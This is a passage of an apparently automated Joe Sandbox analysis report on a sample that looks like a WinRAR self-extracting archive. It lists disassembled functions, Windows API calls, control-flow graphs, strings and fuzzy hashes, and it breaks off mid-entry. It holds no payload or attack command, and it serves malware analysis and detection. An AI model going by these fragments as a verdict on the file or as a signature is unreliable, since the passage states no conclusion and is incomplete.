                                                                                                                    • Opcode Fuzzy Hash: 96c927a76f755a2cf553ca8c8ab4a834eed51a298e350ccf7e61611b6ff34816
                                                                                                                    • Instruction Fuzzy Hash: 7782E970904146AEDF15EB64C895BFABFB9FF45300F4845B9EC49BB242DB315A88CB60
                                                                                                                    Function 0059B7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0059B7E5
                                                                                                                      • Part of subcall function 00581316: GetDlgItem.USER32(00000000,00003021), ref: 0058135A
                                                                                                                      • Part of subcall function 00581316: SetWindowTextW.USER32(00000000,005B35F4), ref: 00581370
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0059B8D1
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0059B8EF
                                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 0059B902
                                                                                                                    • TranslateMessage.USER32(?), ref: 0059B910
                                                                                                                    • DispatchMessageW.USER32(?), ref: 0059B91A
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0059B93D
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0059B960
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0059B983
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0059B99E
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,005B35F4), ref: 0059B9B1
                                                                                                                      • Part of subcall function 0059D453: _wcschr.LIBVCRUNTIME ref: 0059D45C
                                                                                                                      • Part of subcall function 0059D453: _wcslen.LIBCMT ref: 0059D47D
                                                                                                                    • SetFocus.USER32(00000000), ref: 0059B9B8
                                                                                                                    • _swprintf.LIBCMT ref: 0059BA24
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                      • Part of subcall function 0059D4D4: GetDlgItem.USER32(00000068,005DFCB8), ref: 0059D4E8
                                                                                                                      • Part of subcall function 0059D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0059AF07,00000001,?,?,0059B7B9,005B506C,005DFCB8,005DFCB8,00001000,00000000,00000000), ref: 0059D510
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0059D51B
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,000000C2,00000000,005B35F4), ref: 0059D529
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0059D53F
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0059D559
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0059D59D
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0059D5AB
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0059D5BA
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0059D5E1
                                                                                                                      • Part of subcall function 0059D4D4: SendMessageW.USER32(00000000,000000C2,00000000,005B43F4), ref: 0059D5F0
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0059BA68
                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0059BA90
                                                                                                                    • GetTickCount.KERNEL32 ref: 0059BAAE
                                                                                                                    • _swprintf.LIBCMT ref: 0059BAC2
                                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 0059BAF4
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0059BB43
                                                                                                                    • _swprintf.LIBCMT ref: 0059BB7C
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0059BBD0
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0059BBEA
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0059BC47
                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0059BC6F
                                                                                                                    • Sleep.KERNEL32(00000064), ref: 0059BCB9
                                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0059BCE2
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0059BCEB
                                                                                                                    • _swprintf.LIBCMT ref: 0059BD1E
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0059BD7D
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,005B35F4), ref: 0059BD94
                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0059BD9D
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0059BDAC
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0059BDBB
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0059BE68
                                                                                                                    • _wcslen.LIBCMT ref: 0059BEBE
                                                                                                                    • _swprintf.LIBCMT ref: 0059BEE8
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0059BF32
                                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0059BF4C
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0059BF55
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0059BF6B
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0059BF85
                                                                                                                    • SetWindowTextW.USER32(00000000,005CA472), ref: 0059BFA7
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0059C007
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0059C01A
                                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0059C0BD
                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0059C197
                                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0059C1D9
                                                                                                                      • Part of subcall function 0059C73F: __EH_prolog.LIBCMT ref: 0059C744
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0059C1FD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<Y$STARTDLG$^Y$__tmp_rar_sfx_access_check_%u$hY$winrarsfxmappingfile.tmp$Q[
                                                                                                                    • API String ID: 3829768659-3505432909
                                                                                                                    • Opcode ID: 9b5e1ec03f279e2729a5f3a5a873895ffa15a556b623346c959590a037acb9c9
                                                                                                                    • Instruction ID: 8793e6e25def3b9247edee7a6cc1d41670b89bdfd32e1a996d094024ef645aac
                                                                                                                    • Opcode Fuzzy Hash: 9b5e1ec03f279e2729a5f3a5a873895ffa15a556b623346c959590a037acb9c9
                                                                                                                    • Instruction Fuzzy Hash: 6742C170944249AEFF25ABA0AD8EFBE3F6CBB61700F040055F545B60E2DB745E48EB21
                                                                                                                    Function 00590863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 269 590863-590886 call 59ec50 GetModuleHandleW 272 590888-59089f GetProcAddress 269->272 273 5908e7-590b48 269->273 276 5908b9-5908c9 GetProcAddress 272->276 277 5908a1-5908b7 272->277 274 590b4e-590b59 call 5a75fb 273->274 275 590c14-590c40 GetModuleFileNameW call 58c29a call 590602 273->275 274->275 287 590b5f-590b8d GetModuleFileNameW CreateFileW 274->287 292 590c42-590c4e call 58b146 275->292 278 5908cb-5908e0 276->278 279 5908e5 276->279 277->276 278->279 279->273 289 590c08-590c0f CloseHandle 287->289 290 590b8f-590b9b SetFilePointer 287->290 289->275 290->289 293 590b9d-590bb9 ReadFile 290->293 298 590c7d-590ca4 call 58c310 GetFileAttributesW 292->298 299 590c50-590c5b call 59081b 292->299 293->289 294 590bbb-590be0 293->294 296 590bfd-590c06 call 590371 294->296 296->289 306 590be2-590bfc call 59081b 296->306 309 590cae 298->309 310 590ca6-590caa 298->310 299->298 308 590c5d-590c7b CompareStringW 299->308 306->296 308->298 308->310 313 590cb0-590cb5 309->313 310->292 312 590cac 310->312 312->313 314 590cec-590cee 313->314 315 590cb7 313->315 316 590dfb-590e05 314->316 317 590cf4-590d0b call 58c2e4 call 58b146 314->317 318 590cb9-590ce0 call 58c310 GetFileAttributesW 315->318 328 590d0d-590d6e call 59081b * 2 call 58e617 call 584092 call 58e617 call 59a7e4 317->328 329 590d73-590da6 call 584092 AllocConsole 317->329 324 590cea 318->324 325 590ce2-590ce6 318->325 324->314 325->318 326 590ce8 325->326 326->314 335 590df3-590df5 ExitProcess 328->335 334 590da8-590ded GetCurrentProcessId AttachConsole call 5a3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 329->334 329->335 334->335
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 0059087C
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0059088E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005908BF
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00590B69
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00590B83
                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00590B93
                                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,|<[,00000000), ref: 00590BB1
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00590C09
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00590C1E
                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<[,?,00000000,?,00000800), ref: 00590C72
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,|<[,00000800,?,00000000,?,00000800), ref: 00590C9C
                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,D=[,00000800), ref: 00590CD8
                                                                                                                      • Part of subcall function 0059081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00590836
                                                                                                                      • Part of subcall function 0059081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0058F2D8,Crypt32.dll,00000000,0058F35C,?,?,0058F33E,?,?,?), ref: 00590858
                                                                                                                    • _swprintf.LIBCMT ref: 00590D4A
                                                                                                                    • _swprintf.LIBCMT ref: 00590D96
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                    • AllocConsole.KERNEL32 ref: 00590D9E
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00590DA8
                                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00590DAF
                                                                                                                    • _wcslen.LIBCMT ref: 00590DC4
                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00590DD5
                                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00590DDC
                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00590DE7
                                                                                                                    • FreeConsole.KERNEL32 ref: 00590DED
                                                                                                                    • ExitProcess.KERNEL32 ref: 00590DF5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                    • String ID: (=[$,<[$,@[$0?[$0A[$4B[$8>[$D=[$DXGIDebug.dll$H?[$H@[$HA[$P>[$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=[$`@[$d?[$dA[$dwmapi.dll$h=[$h>[$kernel32$uxtheme.dll$|<[$|?[$|@[$<[$>[$?[$@[$A[
                                                                                                                    • API String ID: 1207345701-1314043
                                                                                                                    • Opcode ID: f79f3a642a5c77fddc9c21aa5ee99a3bbf1228fe38d718ba0c4ae2f7ab024776
                                                                                                                    • Instruction ID: 3181ef93ae4db4a1308d565585739910f9ced30a0c17f8c351beea7904dc1e2a
                                                                                                                    • Opcode Fuzzy Hash: f79f3a642a5c77fddc9c21aa5ee99a3bbf1228fe38d718ba0c4ae2f7ab024776
                                                                                                                    • Instruction Fuzzy Hash: 42D16EB1448385AFD730AF50884DADFBEECBF85704F504D1DF585AA191D7B0AA48CB62
                                                                                                                    Function 0059C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 348 59c73f-59c757 call 59eb78 call 59ec50 353 59d40d-59d418 348->353 354 59c75d-59c787 call 59b314 348->354 354->353 357 59c78d-59c792 354->357 358 59c793-59c7a1 357->358 359 59c7a2-59c7b7 call 59af98 358->359 362 59c7b9 359->362 363 59c7bb-59c7d0 call 591fbb 362->363 366 59c7dd-59c7e0 363->366 367 59c7d2-59c7d6 363->367 369 59d3d9-59d404 call 59b314 366->369 370 59c7e6 366->370 367->363 368 59c7d8 367->368 368->369 369->358 382 59d40a-59d40c 369->382 372 59c7ed-59c7f0 370->372 373 59ca7c-59ca7e 370->373 374 59ca5f-59ca61 370->374 375 59c9be-59c9c0 370->375 372->369 380 59c7f6-59c850 call 59a64d call 58bdf3 call 58a544 call 58a67e call 586edb 372->380 373->369 377 59ca84-59ca8b 373->377 374->369 376 59ca67-59ca77 SetWindowTextW 374->376 375->369 379 59c9c6-59c9d2 375->379 376->369 377->369 381 59ca91-59caaa 377->381 383 59c9d4-59c9e5 call 5a7686 379->383 384 59c9e6-59c9eb 379->384 436 59c98f-59c9a4 call 58a5d1 380->436 386 59caac 381->386 387 59cab2-59cac0 call 5a3e13 381->387 382->353 383->384 390 59c9ed-59c9f3 384->390 391 59c9f5-59ca00 call 59b48e 384->391 386->387 387->369 404 59cac6-59cacf 387->404 396 59ca05-59ca07 390->396 391->396 398 59ca09-59ca10 call 5a3e13 396->398 399 59ca12-59ca32 call 5a3e13 call 5a3e3e 396->399 398->399 425 59ca4b-59ca4d 399->425 426 59ca34-59ca3b 399->426 409 59caf8-59cafb 404->409 410 59cad1-59cad5 404->410 412 59cb01-59cb04 409->412 413 59cbe0-59cbee call 590602 409->413 410->412 415 59cad7-59cadf 410->415 418 59cb11-59cb2c 412->418 419 59cb06-59cb0b 412->419 427 59cbf0-59cc04 call 5a279b 413->427 415->369 416 59cae5-59caf3 call 590602 415->416 416->427 437 59cb2e-59cb68 418->437 438 59cb76-59cb7d 418->438 419->413 419->418 425->369 428 59ca53-59ca5a call 5a3e2e 425->428 432 59ca3d-59ca3f 426->432 433 59ca42-59ca4a call 5a7686 426->433 447 59cc11-59cc62 call 590602 call 59b1be GetDlgItem SetWindowTextW SendMessageW call 5a3e49 427->447 448 59cc06-59cc0a 427->448 428->369 432->433 433->425 454 59c9aa-59c9b9 call 58a55a 436->454 455 59c855-59c869 SetFileAttributesW 436->455 471 59cb6a 437->471 472 59cb6c-59cb6e 437->472 440 59cbab-59cbce call 5a3e13 * 2 438->440 441 59cb7f-59cb97 call 5a3e13 438->441 440->427 476 59cbd0-59cbde call 5905da 440->476 441->440 458 59cb99-59cba6 call 5905da 441->458 482 59cc67-59cc6b 447->482 448->447 453 59cc0c-59cc0e 448->453 453->447 454->369 460 59c90f-59c91f GetFileAttributesW 455->460 461 59c86f-59c8a2 call 58b991 call 58b690 call 5a3e13 455->461 458->440 460->436 469 59c921-59c930 DeleteFileW 460->469 492 59c8b5-59c8c3 call 58bdb4 461->492 493 59c8a4-59c8b3 call 5a3e13 461->493 469->436 475 59c932-59c935 469->475 471->472 472->438 479 59c939-59c965 call 584092 GetFileAttributesW 475->479 476->427 488 59c937-59c938 479->488 489 59c967-59c97d MoveFileW 479->489 482->369 486 59cc71-59cc85 SendMessageW 482->486 486->369 488->479 489->436 491 59c97f-59c989 MoveFileExW 489->491 491->436 492->454 498 59c8c9-59c908 call 5a3e13 call 59fff0 492->498 493->492 493->498 498->460
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0059C744
                                                                                                                      • Part of subcall function 0059B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0059B3FB
                                                                                                                      • Part of subcall function 0059AF98: _wcschr.LIBVCRUNTIME ref: 0059B033
                                                                                                                    • _wcslen.LIBCMT ref: 0059CA0A
                                                                                                                    • _wcslen.LIBCMT ref: 0059CA13
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0059CA71
                                                                                                                    • _wcslen.LIBCMT ref: 0059CAB3
                                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0059CBFB
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0059CC36
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0059CC46
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,005CA472), ref: 0059CC54
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0059CC7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                                                    • String ID: %s.%d.tmp$<br>$<Y$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$Y
                                                                                                                    • API String ID: 986293930-1034834540
                                                                                                                    • Opcode ID: c44097d9b89ec22bdb60cfcf6237e9e6dd65df80c924ff5f10a50206080ef51b
                                                                                                                    • Instruction ID: 19fc07b6f8e06a43297d7cb8f1f81dfcadb0861e92029923d092459f9c18d783
                                                                                                                    • Opcode Fuzzy Hash: c44097d9b89ec22bdb60cfcf6237e9e6dd65df80c924ff5f10a50206080ef51b
                                                                                                                    • Instruction Fuzzy Hash: 2EE16572900159AADF24EBA0DD89EEE7BBCBF45310F4045A6F649E7050EB749F848F60
                                                                                                                    Function 0058DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0058DA70
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0058DA91
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0058DAAC
                                                                                                                      • Part of subcall function 0058C29A: _wcslen.LIBCMT ref: 0058C2A2
                                                                                                                      • Part of subcall function 005905DA: _wcslen.LIBCMT ref: 005905E0
                                                                                                                      • Part of subcall function 00591B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0058BAE9,00000000,?,?,?,00010448), ref: 00591BA0
                                                                                                                    • _wcslen.LIBCMT ref: 0058DDE9
                                                                                                                    • __fprintf_l.LIBCMT ref: 0058DF1C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9[
                                                                                                                    • API String ID: 557298264-1075897450
                                                                                                                    • Opcode ID: 509246e02d763846bb301a65bdfc1855f69644f6e21b5440da05abcca9b95894
                                                                                                                    • Instruction ID: 4f97e99ff688bb49a333b82e047e2d569f778cad9a7b225b9edccb98da6bc846
                                                                                                                    • Opcode Fuzzy Hash: 509246e02d763846bb301a65bdfc1855f69644f6e21b5440da05abcca9b95894
                                                                                                                    • Instruction Fuzzy Hash: A732D071900219EACF24FF64C84AAEE7BB9FF45304F44055AFD06A7281EB71AD85CB50
                                                                                                                    Function 0059D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0059B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0059B579
                                                                                                                      • Part of subcall function 0059B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0059B58A
                                                                                                                      • Part of subcall function 0059B568: IsDialogMessageW.USER32(00010448,?), ref: 0059B59E
                                                                                                                      • Part of subcall function 0059B568: TranslateMessage.USER32(?), ref: 0059B5AC
                                                                                                                      • Part of subcall function 0059B568: DispatchMessageW.USER32(?), ref: 0059B5B6
                                                                                                                    • GetDlgItem.USER32(00000068,005DFCB8), ref: 0059D4E8
                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,0059AF07,00000001,?,?,0059B7B9,005B506C,005DFCB8,005DFCB8,00001000,00000000,00000000), ref: 0059D510
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0059D51B
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,005B35F4), ref: 0059D529
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0059D53F
                                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0059D559
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0059D59D
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0059D5AB
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0059D5BA
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0059D5E1
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,005B43F4), ref: 0059D5F0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                                    • Opcode ID: 57cd9e0200d25caceabbd78f742d621564ef3b1f035a7b8e78ce68373164f3fb
                                                                                                                    • Instruction ID: af8b3987ffb29dbe19337a03ad29bf5d76fb2b9bbf28336d28bf898692e61855
                                                                                                                    • Opcode Fuzzy Hash: 57cd9e0200d25caceabbd78f742d621564ef3b1f035a7b8e78ce68373164f3fb
                                                                                                                    • Instruction Fuzzy Hash: CD31C171145792AFE315DF20DC8EFAB7FACEBA2708F000518F5919B190DB649B089B76
                                                                                                                    Function 0059D78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
